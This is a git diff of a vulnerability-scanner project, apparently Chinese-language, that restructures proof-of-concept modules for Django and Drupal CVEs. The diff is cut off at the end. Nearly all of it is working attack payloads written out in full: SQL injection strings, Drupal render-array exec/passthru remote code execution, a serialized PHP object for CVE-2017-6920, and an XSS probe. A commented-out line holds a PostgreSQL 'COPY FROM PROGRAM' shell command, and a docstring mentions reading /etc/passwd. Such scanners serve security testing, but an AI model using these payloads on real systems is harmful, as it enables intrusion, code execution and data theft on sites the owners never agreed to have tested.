-                return results
-    return None
diff --git a/payloads/Django/cve_2021_35042.py b/payloads/Django/cve_2021_35042.py
deleted file mode 100644
index b1a41a2..0000000
--- a/payloads/Django/cve_2021_35042.py
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-# from lib.tool import check
-
-cve_2021_35042_payloads = [
-    {'path': '{URLCONF}/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23'}
-    # {'path': '?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23'}
-]
-
-def cve_2021_35042_scan(self, clients):
-    ''' 函数 QuerySet.order_by 中的 SQL 注入漏洞; 
-        该漏洞需要开发者使用order_by函数, 而且可以控制查询集的输入
-     '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'SQLinject',
-        'vul_id': 'CVE-2021-35042',
-    }
-    
-    urlConfList = self.get_urlconf(client, vul_info)     # * 获取Django定义的URL路径
-    if not urlConfList:
-        return None
-    
-    for payload in cve_2021_35042_payloads:
-        for urlConf in urlConfList:
-            path = payload['path'].format(URLCONF=urlConf)
-            url = client.protocol_domain + '/'
-
-            res = client.request(
-                'get',
-                url + path,
-                vul_info=vul_info
-            )
-            if res is None:
-                continue
-
-            if ((('OperationalError' in res.text) or ('DatabaseError' in res.text)) 
-                and ('Request information' in res.text)):
-                results = {
-                    'Target': res.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request': res
-                }
-                return results
-    return None
diff --git a/payloads/Django/django-cve-2017-12794-xss.py b/payloads/Django/django-cve-2017-12794-xss.py
new file mode 100644
index 0000000..9d9973c
--- /dev/null
+++ b/payloads/Django/django-cve-2017-12794-xss.py
@@ -0,0 +1,80 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Django debug page XSS漏洞
+    CVE-2017-12794
+        Payload: https://vulhub.org/#/environments/django/CVE-2018-14574/
+
+Django debug page XSS漏洞
+    构造url创建新用户, 同时拼接xss语句, 得到已创建的提示;
+    此时再次访问该链接(即创建同一个xss用户), 将触发恶意代码
+'''
+
+from payloads.Django.tool_get_urlconf import get_urlconf
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '{URLCONF}/?username=<ScRiPt>prompt(\'{TEXT}\')</sCrIpt>'},
+            # {'path': 'create_user/?username=<ScRiPt>prompt(\'{TEXT}\')</sCrIpt>'},
+            # {'path': '?username=<ScRiPt>prompt(\'{TEXT}\')</sCrIpt>'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Django',
+            'vul_type': 'XSS',
+            'vul_id': 'CVE-2017-12794',
+        }
+        
+        urlConfList = get_urlconf(client, vul_info)     # * 获取Django定义的URL路径
+        if not urlConfList:
+            return None
+        
+        for payload in self.payloads:        # * Payload
+            for urlConf in urlConfList:
+                random_str = random_md5(5)                  # * 随机5位字符串
+                
+                path = payload['path'].format(URLCONF=urlConf, TEXT=random_str)  # * Path
+
+                res1 = client.request(
+                    'get',
+                    path,
+                    vul_info=vul_info
+                )
+                if res1 is None:
+                    continue
+
+                # * 该XSS漏洞的特性, 需要请求2次, 2次的payload必须一模一样
+                res2 = client.request(
+                    'get',
+                    path,
+                    vul_info=vul_info
+                )
+                if res2 is None:
+                    continue
+
+                text_1 = "<ScRiPt>prompt('" + random_str + "')"
+                text_2 = "<ScRiPt>confirm('" + random_str + "')"
+                
+                if (text_1 in res2.text
+                    or text_2 in res2.text
+                ):
+                    results = {
+                        'Target': res2.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res2
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Django/django-cve-2018-14574-redirect.py b/payloads/Django/django-cve-2018-14574-redirect.py
new file mode 100644
index 0000000..904f0f3
--- /dev/null
+++ b/payloads/Django/django-cve-2018-14574-redirect.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Django CommonMiddleware url重定向漏洞
+    CVE-2018-14574
+        Payload: https://vulhub.org/#/environments/django/CVE-2018-14574/
+
+如果 django.middleware.common.CommonMiddleware和 APPEND_SLASH设置都已启用; 
+    如果项目的 URL 模式接受任何以斜杠结尾的路径, 则对该站点的恶意制作的 URL 的请求可能会导致重定向到另一个站点; 
+    从而启用网络钓鱼和其他攻击
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '/www.example.com'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Django',
+            'vul_type': 'Redirect',
+            'vul_id': 'CVE-2018-14574',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (res.headers.get('Location')
+                and ('//www.example.com/' in res.headers.get('Location', ''))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Django/django-cve-2019-14234-sqlinject.py b/payloads/Django/django-cve-2019-14234-sqlinject.py
new file mode 100644
index 0000000..c739da5
--- /dev/null
+++ b/payloads/Django/django-cve-2019-14234-sqlinject.py
@@ -0,0 +1,69 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Django JSONfield sql注入漏洞
+    CVE-2019-14234
+        Payload: https://vulhub.org/#/environments/django/CVE-2018-14574/
+                 https://blog.csdn.net/weixin_42250835/article/details/121106792
+
+Django JSONfield sql注入漏洞
+    需要登录, 并进入当前用户的目录下
+'''
+
+from payloads.Django.tool_get_urlconf import get_urlconf
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '{URLCONF}/?detail__a\'b=123'},
+            # {'path': 'admin/vuln/collection/?detail__a\'b=123'},
+            # {'path': 'vuln/collection/?detail__a\'b=123'},
+            # {'path': 'collection/?detail__a\'b=123'},
+            # {'path': '?detail__a\'b=123'},
+            # {   # * 配合CVE-2019-9193完成Getshell
+            #     'path': "?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'touch /tmp/test.txt'--%20",
+            # }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Django',
+            'vul_type': 'SQLinject',
+            'vul_id': 'CVE-2019-14234',
+        }
+        
+        urlConfList = get_urlconf(client, vul_info)     # * 获取Django定义的URL路径
+        if not urlConfList:
+            return None
+
+        for payload in self.payloads:
+            for urlConf in urlConfList:
+                path = payload['path'].format(URLCONF=urlConf)
+                url = client.protocol_domain + '/'
+
+                res = client.request(
+                    'get',
+                    url + path,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+
+                if (('ProgrammingError' in res.text) or ('Request information' in res.text)):
+                    results = {
+                        'Target': res.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Django/django-cve-2020-9402-sqlinject.py b/payloads/Django/django-cve-2020-9402-sqlinject.py
new file mode 100644
index 0000000..13fc76c
--- /dev/null
+++ b/payloads/Django/django-cve-2020-9402-sqlinject.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Django GIS函数 sql注入漏洞
+    CVE-2020-9402
+        Payload: https://vulhub.org/#/environments/django/CVE-2020-9402/
+
+该漏洞需要开发者使用JSONField/HStoreField, 可以控制查询集的字段名称; 
+    Django的内置应用程序 Django-Admin 受到影响
+'''
+
+from payloads.Django.tool_get_urlconf import get_urlconf
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '{URLCONF}/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1+1'},
+            {'path': '{URLCONF}/?q=0.05))) FROM "VULN_COLLECTION2"  where  (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null  --'},
+            # {'path': '?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1+1'},
+            # {'path': '?q=0.05))) FROM "VULN_COLLECTION2"  where  (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null  --'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Django',
+            'vul_type': 'SQLinject',
+            'vul_id': 'CVE-2020-9402',
+        }
+        
+        urlConfList = get_urlconf(client, vul_info)     # * 获取Django定义的URL路径
+        if not urlConfList:
+            return None
+        
+        for payload in self.payloads:
+            for urlConf in urlConfList:
+                path = payload['path'].format(URLCONF=urlConf)
+                url = client.protocol_domain + '/'
+
+                res = client.request(
+                    'get',
+                    url + path,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+
+                if (('DatabaseError' in res.text) and ('Request information' in res.text)):
+                    results = {
+                        'Target': res.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Django/django-cve-2021-35042-sqlinject.py b/payloads/Django/django-cve-2021-35042-sqlinject.py
new file mode 100644
index 0000000..7abd80c
--- /dev/null
+++ b/payloads/Django/django-cve-2021-35042-sqlinject.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Django QuerySet.order_by sql注入漏洞
+    CVE-2021-35042
+        Payload: https://vulhub.org/#/environments/django/CVE-2021-35042/
+
+函数 QuerySet.order_by 中的 SQL 注入漏洞; 
+    该漏洞需要开发者使用order_by函数, 而且可以控制查询集的输入
+'''
+
+from payloads.Django.tool_get_urlconf import get_urlconf
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': '{URLCONF}/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23'}
+            # {'path': '?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Django',
+            'vul_type': 'SQLinject',
+            'vul_id': 'CVE-2021-35042',
+        }
+        
+        urlConfList = get_urlconf(client, vul_info)     # * 获取Django定义的URL路径
+        if not urlConfList:
+            return None
+        
+        for payload in self.payloads:
+            for urlConf in urlConfList:
+                path = payload['path'].format(URLCONF=urlConf)
+                url = client.protocol_domain + '/'
+
+                res = client.request(
+                    'get',
+                    url + path,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+
+                if ((('OperationalError' in res.text) or ('DatabaseError' in res.text)) 
+                    and ('Request information' in res.text)):
+                    results = {
+                        'Target': res.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Request': res
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Django/main.py b/payloads/Django/main.py
deleted file mode 100644
index 40af63d..0000000
--- a/payloads/Django/main.py
+++ /dev/null
@@ -1,63 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    Django扫描类: 
-        1. Django debug page XSS漏洞
-            CVE-2017-12794
-                Payload: https://vulhub.org/#/environments/django/CVE-2018-14574/
-
-        2. Django JSONfield sql注入漏洞
-            CVE-2019-14234
-                Payload: https://vulhub.org/#/environments/django/CVE-2018-14574/
-                         https://blog.csdn.net/weixin_42250835/article/details/121106792
-
-        3. Django CommonMiddleware url重定向漏洞
-            CVE-2018-14574
-                Payload: https://vulhub.org/#/environments/django/CVE-2018-14574/
-
-        4. Django GIS函数 sql注入漏洞
-            CVE-2020-9402
-                Payload: https://vulhub.org/#/environments/django/CVE-2020-9402/
-        
-        5. Django QuerySet.order_by sql注入漏洞
-            CVE-2021-35042
-                Payload: https://vulhub.org/#/environments/django/CVE-2021-35042/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Django.tool_get_urlconf import get_urlconf
-from payloads.Django.cve_2017_12794 import cve_2017_12794_scan
-from payloads.Django.cve_2018_14574 import cve_2018_14574_scan
-from payloads.Django.cve_2019_14234 import cve_2019_14234_scan
-from payloads.Django.cve_2020_9402 import cve_2020_9402_scan
-from payloads.Django.cve_2021_35042 import cve_2021_35042_scan
-
-class Django():
-    def __init__(self):
-        self.app_name = 'Django'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target=self.{}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=self.cve_2017_12794_scan, clients=clients),
-            thread(target=self.cve_2018_14574_scan, clients=clients),
-            thread(target=self.cve_2019_14234_scan, clients=clients),
-            thread(target=self.cve_2020_9402_scan, clients=clients),
-            thread(target=self.cve_2021_35042_scan, clients=clients)
-        ]
-
-Django.get_urlconf = get_urlconf
-Django.cve_2017_12794_scan = cve_2017_12794_scan
-Django.cve_2018_14574_scan = cve_2018_14574_scan
-Django.cve_2019_14234_scan = cve_2019_14234_scan
-Django.cve_2020_9402_scan = cve_2020_9402_scan
-Django.cve_2021_35042_scan = cve_2021_35042_scan
-
-django = Django()
\ No newline at end of file
diff --git a/payloads/Django/tool_get_urlconf.py b/payloads/Django/tool_get_urlconf.py
index 11c3287..62b1cca 100644
--- a/payloads/Django/tool_get_urlconf.py
+++ b/payloads/Django/tool_get_urlconf.py
@@ -3,7 +3,7 @@
 
 import re
 
-def get_urlconf(self, client, vul_info):
+def get_urlconf(client, vul_info):
     ''' 获取Django定义的URL路径 '''
     path = 'abcdefg'
     
@@ -38,5 +38,5 @@ def get_urlconf(self, client, vul_info):
                 urlConfList[i] = urlPath.replace(delete_str, '').strip('/')
             else:
                 urlConfList[i] = urlPath.strip('/')
-    
+
     return urlConfList
diff --git a/payloads/Drupal/cve_2014_3704.py b/payloads/Drupal/cve_2014_3704.py
deleted file mode 100644
index defa7e9..0000000
--- a/payloads/Drupal/cve_2014_3704.py
+++ /dev/null
@@ -1,47 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-# from lib.tool import check
-
-cve_2014_3704_payloads = [
-    {
-        'path': '?q=node&destination=node',
-        'data': 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
-    }
-]
-        
-def cve_2014_3704_scan(self, clients):
-    ''' 7.32之前的Drupal core 7.x中的数据库抽象API中的expandArguments函数, 
-        无法正确构造准备好的语句, 这使得远程攻击者可以通过包含精心制作的密钥的数组进行SQL注入攻击
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'SQLinject',
-        'vul_id': 'CVE-2014-3704',
-    }
-
-    for payload in cve_2014_3704_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('DatabaseConnection-&gt;escapeLike()' in res.text) 
-            and ('user_login_authenticate_validate' in res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Drupal/cve_2017_6920.py b/payloads/Drupal/cve_2017_6920.py
deleted file mode 100644
index cec0359..0000000
--- a/payloads/Drupal/cve_2017_6920.py
+++ /dev/null
@@ -1,68 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-# from lib.tool import check
-
-cve_2017_6920_payloads = [
-    {
-        'path': 'admin/config/development/configuration/single/import',
-        'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
-    },
-    {
-        'path': 'config/development/configuration/single/import',
-        'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
-    },
-    {
-        'path': 'development/configuration/single/import',
-        'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
-    },
-    {
-        'path': 'configuration/single/import',
-        'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
-    },
-    {
-        'path': 'single/import',
-        'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
-    }
-]
-
-def cve_2017_6920_scan(self, clients):
-    '''  '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'unSerialize/RCE',
-        'vul_id': 'CVE-2017-6920',
-    }
-
-    for payload in cve_2017_6920_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        form_token = self.get_form_token(client, path, vul_info)
-        if (form_token):
-            random_name = random_md5(6)
-            data = data.format(CONFIGNAME=random_name, TOKEN=form_token)
-        else:
-            return None
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('PHP Version' in res.text) and ('PHP License' in res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Drupal/cve_2018_7600.py b/payloads/Drupal/cve_2018_7600.py
deleted file mode 100644
index 3719ef1..0000000
--- a/payloads/Drupal/cve_2018_7600.py
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2018_7600_payloads = [
-    {
-        'path': 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax',
-        'data': 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]={RCECOMMAND}'
-    },
-    {
-        'path': 'register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax',
-        'data': 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]={RCECOMMAND}'
-    },
-]
-
-def cve_2018_7600_scan(self, clients):
-    '''  '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2018-7600',
-    }
-
-    for payload in cve_2018_7600_payloads:
-        random_str = random_md5(6)
-        RCEcommand = 'echo ' + random_str
-        
-        path = payload['path']
-        data = payload['data'].format(RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res(res.text, random_str)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Drupal/cve_2018_7602.py b/payloads/Drupal/cve_2018_7602.py
deleted file mode 100644
index 8643d6e..0000000
--- a/payloads/Drupal/cve_2018_7602.py
+++ /dev/null
@@ -1,79 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-import re
-
-cve_2018_7602_payloads = [
-    {
-        'path-1': '?q=%2Fuser%2F1%2Fcancel',
-        
-        'path-2': '?q=%2Fuser%2F1%2Fcancel&destination=%2Fuser%2F1%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3D',
-        'data-2': 'form_id=user_cancel_confirm_form&form_token={TOKEN}&_triggering_element_name=form_id&op=Cancel+account',
-        
-        'path-3': '?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F',
-        'data-3': 'form_build_id=',
-    },
-]
-
-def cve_2018_7602_scan(self, clients):
-    ''' 对URL中的#进行编码两次, 即可绕过sanitize()函数的过滤 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2018-7602',
-    }
-
-    for payload in cve_2018_7602_payloads:
-        path_1 = payload['path-1']
-
-        # todo 1 / 获取 Drupal的Token
-        form_token = self.get_form_token(client, path_1, vul_info)  # * res1
-        if (form_token):
-            # todo 2 / 命令执行, 并获取 Build id
-            random_str = random_md5(6)
-            RCEcommand = 'echo ' + random_str
-            
-            path_2 = payload['path-2'] + RCEcommand
-            data_2 = payload['data-2'].format(TOKEN=form_token)
-
-            res2 = client.request(
-                'post',
-                path_2,
-                data=data_2,
-                allow_redirects=False,
-                vul_info=vul_info
-            )
-            if res2 is None:
-                continue
-
-            form_build_id = re.search(r'name="form_build_id" value="form-.{43}', res2.text, re.I|re.M|re.U|re.S)
-            if (form_build_id):
-                # todo 3 / 访问 Build id的路径, 验证回显
-                buildId = form_build_id.group().replace('name="form_build_id" value="', '')
-
-                path_3 = payload['path-3'] + buildId
-                data_3 = payload['data-3'] + buildId
-
-                res3 = client.request(
-                    'post',
-                    path_3,
-                    data=data_3,
-                    allow_redirects=False,
-                    vul_info=vul_info
-                )
-                if res3 is None:
-                    continue
-            
-                if (check.check_res(res3.text, random_str)):
-                    results = {
-                        'Target': res2.request.url,
-                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                        'Request-1': res2,
-                        'Request-2': res3,
-                    }
-                    return results
-    return None
diff --git a/payloads/Drupal/drupal-cve-2014-3704-sqlinject.py b/payloads/Drupal/drupal-cve-2014-3704-sqlinject.py
new file mode 100644
index 0000000..18951fd
--- /dev/null
+++ b/payloads/Drupal/drupal-cve-2014-3704-sqlinject.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Drupal < 7.32 Drupalgeddon SQL 注入
+    CVE-2014-3704
+        Payload: https://vulhub.org/#/environments/drupal/CVE-2014-3704/
+
+7.32之前的Drupal core 7.x中的数据库抽象API中的expandArguments函数, 
+    无法正确构造准备好的语句, 这使得远程攻击者可以通过包含精心制作的密钥的数组进行SQL注入攻击
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': '?q=node&destination=node',
+                'data': 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Drupal',
+            'vul_type': 'SQLinject',
+            'vul_id': 'CVE-2014-3704',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('DatabaseConnection-&gt;escapeLike()' in res.text) 
+                and ('user_login_authenticate_validate' in res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Drupal/drupal-cve-2017-6920-rce.py b/payloads/Drupal/drupal-cve-2017-6920-rce.py
new file mode 100644
index 0000000..a7b2532
--- /dev/null
+++ b/payloads/Drupal/drupal-cve-2017-6920-rce.py
@@ -0,0 +1,84 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Drupal Core 8 PECL YAML 反序列化任意代码执行
+    CVE-2017-6920
+        Payload: https://vulhub.org/#/environments/drupal/CVE-2017-6920/
+
+
+'''
+
+from payloads.Drupal.tool_get_token import get_form_token
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'admin/config/development/configuration/single/import',
+                'data': 'config_type=system.simple&config_name={CONFIGNAME}&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={TOKEN}&form_id=config_single_import_form&op=Import'
+            },
+            {
+                'path': 'config/development/configuration/single/import',
